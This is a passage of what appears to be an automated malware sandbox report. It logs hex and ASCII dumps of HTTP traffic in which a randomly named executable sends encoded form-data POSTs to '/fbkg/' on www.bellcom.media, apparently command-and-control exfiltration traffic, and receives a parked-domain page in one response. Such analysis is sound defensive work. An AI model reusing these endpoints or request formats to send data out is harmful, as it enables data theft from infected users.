soSSrvp2snEqOoxqDalrdFXkvlNSe53iHJBmbFcTY2Hj8s9n0QeWsUFHhNRW/Qoq6jnSdzU3azRLC2LRfJ4Wh8j/wlo4UqwBJRSkNlz+ASYbAuQ95l06nbBFNd7Rmg/tFPh0nhw5+aTlCMXvZWPw5Lhg8xOZvPwIcq3pNdHWk34S0QpawIdJvJyR8UvbBZ7OxIralh6uWBQN0SG/KN96VG2rgiGLzga5lHXdx5O6eMfPUkC25UWDP42jRk2q3HIg1Fp53KM015GCvrIwVpARx88zANhNFHNVNQJ0rml7nuueJ9JFH4g1CxqymERymFT0Ec8p98tbty0Cy/P63kv+NNxuHpsIYcLLRNfXX6vz7U/U7VbHjhljSnimzLaygI/3CmDieTvZgyP15e5lPDQfLQI3CprZGC7q2bnNz1QLD4RS23uS4MQag6uDY/34Ty4XyiUM+CUle8o8sw2Sg1ea0LCfUqgmgRHFMu1eblPd4icWBDXzBy/1G0qWM7acQ0apcFwClxz85kujIERC7PZw4PcqfBvYC9EACUAl6Xvdxcl/TGsX1N5opsWI76X8XpnF24i937kgh+jsjJQLgpE5KjD1ktNaMqBPvL9zX1I1Ghq8SD2ek6qq0nEWKrLeHT77gi7Mu7koB9VKZ4PVjEvPP3ax6590WvQqRWmlYRdrthzrTe6kIk2iT6Rl/XTZMz5XsMWH+Wx
                                                                                                                                                                                                Nov 17, 2023 19:30:45.626821995 CET1065OUTData Raw: 63 38 46 35 6d 79 6a 61 42 6d 64 6d 47 4c 4c 65 4d 6f 56 35 6b 6e 5a 4d 43 6d 2f 38 43 32 4a 53 73 56 57 73 56 34 37 38 4c 47 73 58 4d 69 55 70 35 48 64 44 41 4c 55 44 37 32 41 69 34 70 54 2b 4f 6a 5a 32 47 44 68 48 59 44 6e 6c 69 7a 34 69 45 66
                                                                                                                                                                                                Data Ascii: c8F5myjaBmdmGLLeMoV5knZMCm/8C2JSsVWsV478LGsXMiUp5HdDALUD72Ai4pT+OjZ2GDhHYDnliz4iEfPUCl4uTpbp/Czu0Wj0eLgBMQH7QzJqRWrzHXTtXbiOCdAwAo2sFhEhl99w1YikgNwTfYy2Eii7iOYOT23HjrLZwsjryCUm5fJ41JPJnaVhpkS7Kp76TaHBKd9RnKtq8/t9lu15AVr9Nnw15mlIfb8gMORCVuu0ncd
                                                                                                                                                                                                Nov 17, 2023 19:30:45.727010012 CET1066OUTData Raw: 37 50 43 2f 78 6e 61 74 74 49 50 77 53 47 78 7a 45 6f 6d 51 54 77 72 67 77 78 4b 71 49 4c 4f 69 49 36 73 56 6e 58 73 48 38 48 65 57 45 77 54 38 79 47 6f 74 4b 5a 70 31 33 6f 4a 58 35 59 4c 68 66 7a 4c 72 67 31 7a 45 4f 2b 57 56 54 48 74 50 34 73
                                                                                                                                                                                                Data Ascii: 7PC/xnattIPwSGxzEomQTwrgwxKqILOiI6sVnXsH8HeWEwT8yGotKZp13oJX5YLhfzLrg1zEO+WVTHtP4sNRGWfImHcQw/V8ooTrJFCiiCfvooEPpXGioeZKZMXBhu7FdQjw7lWb7twybbQTg3rx7KM7mZHEZgZMXrNBSnaTnLtFqdGPKuDd9l4N0+Wk4pNRrsshjQF8AZ3nBWLOXq8KpLIH24NOm64n2c72+q+qFvItyqgGUOC
                                                                                                                                                                                                Nov 17, 2023 19:30:45.727181911 CET1071OUTData Raw: 76 73 7a 35 64 6b 69 48 31 53 71 2f 71 65 44 52 75 6e 77 6a 6a 76 6d 36 7a 6c 67 47 50 2b 39 5a 6f 55 48 32 42 49 7a 48 57 49 72 62 6d 68 5a 68 2b 73 76 32 66 56 63 45 79 75 70 52 78 4e 4c 61 6c 6e 70 62 77 2b 4e 6c 4f 35 66 6c 67 53 75 6e 79 4d
                                                                                                                                                                                                Data Ascii: vsz5dkiH1Sq/qeDRunwjjvm6zlgGP+9ZoUH2BIzHWIrbmhZh+sv2fVcEyupRxNLalnpbw+NlO5flgSunyMWK3VNAloS9ORLSma0q0mzo28fJY6LS6s4Y9df4jdRQ8SyR6fQdf9OmEFF53Jl6Mh3/PNlTiqIRs5L3WLIwr5UtJnuk9+Ne9UE7g+1oNxxD7f1khHjjV240L6T8mjAuA83HFSR+h67feh4HuYBmMYHd6qXjcZxpV9+
                                                                                                                                                                                                Nov 17, 2023 19:30:45.727261066 CET1078OUTData Raw: 46 55 6f 6b 57 42 50 71 43 32 4b 74 4b 42 6b 43 69 62 37 48 6b 44 42 7a 6a 54 33 70 68 77 42 6c 35 56 74 65 75 78 36 6a 53 72 6b 6f 57 69 43 68 34 70 66 65 41 39 35 71 2f 6b 48 47 49 58 30 6d 77 6b 65 57 39 41 30 6a 73 4d 79 33 57 71 7a 2b 43 72
                                                                                                                                                                                                Data Ascii: FUokWBPqC2KtKBkCib7HkDBzjT3phwBl5Vteux6jSrkoWiCh4pfeA95q/kHGIX0mwkeW9A0jsMy3Wqz+CrxESG4oTiAzgN2QYH+lmIhyKRMagMvv4vZ2zI2A4e7HM5S6IDPsalW8pCrXWxqhuw+hd1W3Q6wrV0YgeStGRLNCsnYVPmzwGOw5/UldfeohgUWrQq5Cv+esxnrT2gfU/88e+3hT4cycMYZXtbAWT4U0RavPPT7HnLV
                                                                                                                                                                                                Nov 17, 2023 19:30:45.727478981 CET1079OUTData Raw: 78 49 74 63 37 32 61 41 43 33 53 47 6d 43 73 4f 58 70 58 58 2b 4c 6d 6d 4b 4a 52 46 69 78 37 62 6e 41 6a 58 4e 50 2f 4e 39 71 50 51 4f 37 6d 56 34 6f 57 61 34 43 4b 56 55 41 2f 48 30 71 46 6f 71 6c 6f 70 71 6a 74 2b 4e 68 47 35 41 2f 70 2b 44 6d
                                                                                                                                                                                                Data Ascii: xItc72aAC3SGmCsOXpXX+LmmKJRFix7bnAjXNP/N9qPQO7mV4oWa4CKVUA/H0qFoqlopqjt+NhG5A/p+DmW45vapFtHX+9dLpnv3qFDklynO04frtjDL7cHfq7nuZoZxjf5O6mtLq7pMJIst3ZrqeWcMTkSfgdLMZfHcOHorjVFo2zM3aFWD9YDqHo8h1I/sutA1RkdWMUFOUM7+RIRRLktTvH8gU6WwZ8eGGzShfYImTkDLYVs
                                                                                                                                                                                                Nov 17, 2023 19:30:45.727655888 CET1083OUTData Raw: 7a 47 39 71 49 78 59 6a 68 48 74 6c 49 2f 45 41 74 59 35 6d 45 2b 55 4a 30 48 6d 6b 72 6d 2b 6b 58 52 30 36 4c 61 5a 51 63 4f 34 74 51 69 2f 4a 76 42 57 37 79 34 65 76 54 66 49 73 4f 45 78 50 4c 69 42 73 6e 63 71 35 56 4d 6b 73 43 63 78 35 69 37
                                                                                                                                                                                                Data Ascii: zG9qIxYjhHtlI/EAtY5mE+UJ0Hmkrm+kXR06LaZQcO4tQi/JvBW7y4evTfIsOExPLiBsncq5VMksCcx5i7ZktrVlgnEji0mNKAdQNmawJPadMkYJF9ZMiBOm7lKs4G7s8rUfgD3CMeXUCGpHKGdoP/eso1UfvuJ+pNN7rLNi6jquykhy7BV/fGXpy7E3jWNAebKcKt9AjHpENIJ1Ebyvxgv5Xk+IYhHAIrN4iV/eNwPPujwgmCP
                                                                                                                                                                                                Nov 17, 2023 19:30:45.727818012 CET1084OUTData Raw: 77 6e 4b 61 54 4d 33 58 70 79 49 43 75 79 51 44 34 37 50 76 70 6d 74 42 59 67 50 6a 36 52 62 39 51 4d 4e 77 74 76 4f 46 71 66 51 62 50 32 56 37 4d 6c 65 68 62 43 53 76 78 6a 36 64 2f 37 7a 41 6b 48 6d 5a 4c 58 32 64 78 45 44 4c 7a 48 6d 73 58 6a
                                                                                                                                                                                                Data Ascii: wnKaTM3XpyICuyQD47PvpmtBYgPj6Rb9QMNwtvOFqfQbP2V7MlehbCSvxj6d/7zAkHmZLX2dxEDLzHmsXjLprlMTvAfC8AbRB1k0KJea7tVKZxAIAxsD6fQBhKnumn/RVtCdrgvNQachXz+rLQgKonE+wnXRc0F7di5UOSuzDaOOL4UeA+Nus/TB/ztPPDyBEF8IDOvtqpG0TwuJiZU/atIAli+cUQ7jnzeTkAwZlsnHtB8PvGQ
                                                                                                                                                                                                Nov 17, 2023 19:30:45.727989912 CET1085OUTData Raw: 6e 71 65 42 38 50 45 79 4e 6f 34 4e 6f 66 7a 6b 52 50 4d 45 55 65 6c 63 47 66 39 6d 2b 4f 56 4e 70 45 6f 71 35 38 52 43 45 6b 73 48 6e 63 2b 66 61 68 68 2b 36 33 76 4f 59 54 6c 30 32 77 71 62 42 76 66 44 71 61 44 66 6b 56 74 35 39 77 31 2b 39 30
                                                                                                                                                                                                Data Ascii: nqeB8PEyNo4NofzkRPMEUelcGf9m+OVNpEoq58RCEksHnc+fahh+63vOYTl02wqbBvfDqaDfkVt59w1+90yPa7cq68TwybzeIgHubdF9mmSYOY3pik6GSt1pMmejbGNK9DbZFpsUXVxgnCMVchVvLCCVYpDfNn6vYzlganAUHvv/FgnDvBnFuedWKXQGqGr4nYj6Ow+DF1ZKIVX+vmzeb6/xY0ap0TLPp3Oe+6VkIC2+xWLeJ44
                                                                                                                                                                                                Nov 17, 2023 19:30:45.728159904 CET1088OUTData Raw: 57 6b 6d 6d 5a 46 67 76 75 59 59 38 66 35 47 59 65 61 4d 36 6d 6a 4f 4c 61 2f 79 49 69 6d 41 77 57 65 64 42 57 39 4c 4b 67 2b 61 6e 32 4a 5a 5a 49 57 79 52 6c 39 39 4e 30 57 4c 56 63 59 33 6b 53 76 48 50 72 30 4d 45 4d 4e 53 4f 35 51 62 56 68 38
                                                                                                                                                                                                Data Ascii: WkmmZFgvuYY8f5GYeaM6mjOLa/yIimAwWedBW9LKg+an2JZZIWyRl99N0WLVcY3kSvHPr0MEMNSO5QbVh8IiLWFkWFvMRoNTFeSLEjRJWB6dnUsUrOZzA/jrt7mWS056qThM70C591HfCSEGemWv/HZuV+APyy1+RUCx3cGT10m6vx+EPJnjV9awB4/Ela/Uiz6n7KT9p32D3STO9TBDmveutQO8vW2do8MzNdrEV8FQZov4UCy
                                                                                                                                                                                                Nov 17, 2023 19:30:45.728276014 CET1089OUTData Raw: 6f 49 58 66 46 51 6b 35 4d 53 6e 42 78 69 57 79 66 54 52 47 76 34 56 46 53 46 31 45 50 57 49 36 42 32 61 78 35 48 33 68 32 67 71 6a 78 79 39 53 33 59 65 36 73 4f 36 36 42 56 45 32 70 41 79 50 72 71 48 30 54 76 70 42 43 36 64 4b 4c 33 6c 43 45 35
                                                                                                                                                                                                Data Ascii: oIXfFQk5MSnBxiWyfTRGv4VFSF1EPWI6B2ax5H3h2gqjxy9S3Ye6sO66BVE2pAyPrqH0TvpBC6dKL3lCE5axK0UhEGFuQUJxOvQBZxmZfr/0d7cHSOgncgVxtjiQCpiRHflugaXNk0hxhdG2C9eDLVMm6/aAPzzX2Gg5TN1FG54JsF58Xjm+5VxRr0TNxxSdRp+toDXiQGAk4eVg7njbeFb2vLiVcMQvivsSa5SgZSoXFgtpVG9
                                                                                                                                                                                                Nov 17, 2023 19:30:45.933751106 CET1108INHTTP/1.1 200 OK
                                                                                                                                                                                                date: Fri, 17 Nov 2023 18:30:44 GMT
                                                                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                                                                content-length: 1085
                                                                                                                                                                                                x-request-id: 5196fd6f-e925-49b6-a847-0f76be474b15
                                                                                                                                                                                                cache-control: no-store, max-age=0
                                                                                                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_omjQe3eg9u3cbj88tUNO7gfW04/QFQZvlstLjvYSDj7usUQeEY3fh4dO74MECTfaK1bW6EWw/cYwuEEXeVq7sg==
                                                                                                                                                                                                set-cookie: parking_session=5196fd6f-e925-49b6-a847-0f76be474b15; expires=Fri, 17 Nov 2023 18:45:45 GMT; path=/
                                                                                                                                                                                                connection: close
                                                                                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6f 6d 6a 51 65 33 65 67 39 75 33 63 62 6a 38 38 74 55 4e 4f 37 67 66 57 30 34 2f 51 46 51 5a 76 6c 73 74 4c 6a 76 59 53 44 6a 37 75 73 55 51 65 45 59 33 66 68 34 64 4f 37 34 4d 45 43 54 66 61 4b 31 62 57 36 45 57 77 2f 63 59 77 75 45 45 58 65 56 71 37 73 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 41 45 41 41 41 41 42 43 41 49 41 41 41 43 51 64 31 50 65 41 41 41 41 44 45 6c 45 51 56 51 49 31 32 50 34 2f 2f 38 2f 41 41 58 2b 41 76 37 63 7a 46 6e 6e 41 41 41 41 41 45 6c 46 54 6b
                                                                                                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_omjQe3eg9u3cbj88tUNO7gfW04/QFQZvlstLjvYSDj7usUQeEY3fh4dO74MECTfaK1bW6EWw/cYwuEEXeVq7sg==" lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTk
                                                                                                                                                                                                Nov 17, 2023 19:30:45.933834076 CET1109INData Raw: 53 75 51 6d 43 43 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68
                                                                                                                                                                                                Data Ascii: SuQmCC"> <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTE5NmZkNmYtZTkyNS00OWI2LWE4NDctMGY3NmJlNDc0YjE1IiwicGFnZV90aW1lIjoxNzA


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                5192.168.11.205013291.195.240.12380C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:26:27.139713049 CET317OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.bellcom.media
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 52912
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.bellcom.media
                                                                                                                                                                                                Referer: http://www.bellcom.media/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 4d 38 61 77 39 66 58 6c 46 32 32 55 31 33 73 38 54 50 55 6b 56 61 43 6c 41 78 45 6e 44 78 4f 73 2f 37 4d 50 54 50 75 6c 72 31 67 5a 35 4d 64 71 59 57 34 42 6f 35 53 38 57 4b 59 37 42 4e 43 78 6f 71 32 78 45 47 37 41 6f 76 55 65 46 53 32 79 35 37 4a 36 38 6d 4e 4b 4d 64 72 73 74 6a 78 42 48 75 53 77 31 32 6d 73 79 46 4e 4c 72 32 69 70 30 41 45 61 75 32 57 32 54 5a 69 59 6c 73 6c 62 67 49 79 39 66 73 30 42 66 6f 4d 48 49 70 6a 56 38 53 76 78 46 67 35 4b 4d 6a 37 6e 38 63 36 34 52 4d 33 65 4b 64 4a 62 31 73 6b 62 4e 6e 7a 35 39 6c 58 54 46 46 34 7a 52 48 38 63 6b 39 73 57 38 4d 54 55 37 4b 68 5a 56 57 30 76 32 4e 68 44 65 4c 68 6b 53 58 70 43 56 4d 6a 4d 64 7a 49 66 73 4b 57 7a 34 6c 31 44 4e 4a 44 34 35 58 31 34 64 6a 77 64 42 65 44 61 65 37 78 37 63 62 4a 30 35 4b 34 75 4a 5a 4b 41 4f 38 50 76 42 36 76 39 47 67 48 6a 55 79 6a 77 30 37 57 32 6d 6e 41 62 4e 30 35 4a 6f 4c 6b 64 64 64 6d 6a 4d 79 55 5a 57 62 56 38 68 43 35 59 46 63 4e 4d 46 6f 57 7a 6f 79 6b 73 2b 2b 76 77 59 78 56 51 77 4f 46 79 59 4d 50 6c 63 70 65 56 48 38 45 2f 50 68 79 5a 33 6d 69 65 56 39 39 74 32 63 37 71 46 77 37 71 4b 45 43 41 44 69 4b 36 63 4b 4d 41 34 75 53 61 57 74 45 62 48 73 48 30 4a 51 4d 4a 76 31 6d 36 72 79 6e 73 6a 35 57 45 38 42 4e 4e 47 32 35 74 76 6f 47 6a 49 4e 67 65 50 33 31 57 45 32 34 2b 67 37 6e 43 64 62 50 31 2f 52 78 66 55 6d 6d 4d 32 49 46 42 31 58 4a 64 4e 67 49 32 34 53 45 45 74 35 4f 57 45 4c 61 57 35 44 6f 4c 70 73 31 4d 6d 58 68 71 54 55 76 78 66 52 4f 59 70 54 6f 2f 70 54 32 30 47 47 6e 77 39 55 69 72 45 33 48 52 6a 69 64 43 57 36 49 4f 66 68 35 47 34 30 69 74 75 42 38 2f 35 41 47 38 52 39 6e 43 4e 41 55 73 4d 4e 75 42 49 6c 73 76 55 30 58 61 6d 41 54 68 31 38 43 77 64 59 63 71 30 52 71 6a 6b 45 30 62 5a 65 4a 61 6a 49 74 50 47 58 4b 56 6e 58 39 69 52 45 70 64 36 2f 38 54 61 34 69 4e 67 37 67 74 6c 4d 6a 52 64 66 44 4f 4d 46 78 44 35 39 44 33 53 56 51 53 6a 70 34 53 7a 74 49 6c 39 54 68 33 79 52 58 76 62 79 55 42 2b 6c 73 56 69 42 71 4f 62 73 61 4f 67 31 55 34 53 47 48 39 39 46 79 49 41 33 44 2f 4a 66 41 37 39 57 74 49 6f 6c 35 41 54 36 38 66 69 2f 77 72 50 4c 76 74 75 53 79 47 73 75 78 50 61 68 50 6c 6c 4c 31 38 68 36 7a 6d 79 61 34 74 58 71 61 7a 49 6f 76 66 4f 38 6b 65 59 41 63 6c 77 46 5a 62 4f 36 56 57 50 54 36 6e 50 49 4b 53 50 57 6b 6e 74 6f 71 44 71 65 49 54 49 6b 63 6b 4a 73 2b 55 5a 6c 30 70 57 34 76 51 68 66 6a 36 54 46 6d 6a 79 31 30 4f 38 45 72 59 6a 7a 76 73 4b 44 36 31 5a 4d 57 54 2b 71 32 34 49 71 4f 58 4c 57 6f 4f 37 4c 4c 38 52 52 75 75 30 65 38 4e 38 49 51 51 48 51 7a 67 39 4d 57 65 79 75 2f 53 50 39 31 7a 42 48 52 72 45 74 54 38 77 52 55 74 78 34 37 6d 43 67 4f 64 6e 56 6c 57 39 77 62 70 6d 77 4d 65 5a 61 63 4e 49 41 51 70 48 6d 68 4d 51 4c 48 57 5a 66 42 55 52 37 39 69 38 61 31 76 4c 5a 66 67 49 35 4b 4b 51 61 42 32 44 72 52 6a 70 54 6a 6a 72 36 68 66 67 6e 61 2f 31 79 75 5a 61 32 6b 6b 71 74 6e 6c 52 70 39 49 39 2f 77 39 46 77 44 52 39 59 76 68 34 54 33 63 7a 6a 36 69 48 6c 39 64 63 43 31 37 6e 34 5a 43 6a 6e 62 6d 79 4d 65 2f 56 51 44 56 74 43 41 5a 6e 2b 6d 43 41 6f 2b 7a 66 2f 72 56 6b 30 5a 78 51 4b 57 41 46 4f 37 33 6f 48 59 46 35 6e 39 35 58 66 6b 2f 72 50 64 2f 52 39 42 44 36 38 6a 37 79 4b 66 76 4d 75 32 74 4f 6c 6a 4e 6e 45 78 4d 2f 42 32 6d 6e 70 30 34 45 4d 4e 61 37 54 70 2b 46 37 42 72 72 32 4d 2b 53 31 73 77 56 64 66 31 4f 42 51 59 65 35 71 4d 42 34 57 72 62 2f 46 72 56 46 38 5a 42 35 78 2b 4c 50 57 70 41 54 45 38 32 33 50 68 41 67 47 50 31 41 59 56 63 51 35 4a 34 33 47 72 41 4f 38 37 47 58 35 55 52 78 65 7a 38 51 48 37 4a 35 70 65 48 54 4c 4a 32 64 59 53 6c 6e 31 78 71 49 45 6d 6e 51 73 2f 76 62 31 79 49 79 33 49 38 58 6b 32 71 49 54 69 4d 32 78 43 63 38 50 65 69 32 53 49 7a 6f 47 59 54 59 55 5a 47 33 43 78 36 62 4c 7a 45 69 49 4f 2b 78 61 56 6d 6d 6a 35 64 37 4a 6d 69 4e 41 54 55 71 42 72 54 77 30 43 53 34 57 6a 54 6a 59 32 4b 6e 43 52 2f 59 50 32 6f 4b 49 56 6e 6b 46 5a 4d 78 6f 7a 59 75 55 63 56 47 41 67 57 48 62 4c 37 74 78 43 4b 4a 55 57 46 45 66 35 42 43 46 43 69 4d 69 35 42 73 72 71 4b 53 4e 78 6d 32 73 48 54 42 39 41 37 74 79 6b 2b 62 6c 48 65 2b 4c 68 79 74 6f
                                                                                                                                                                                                Data Ascii: T6I=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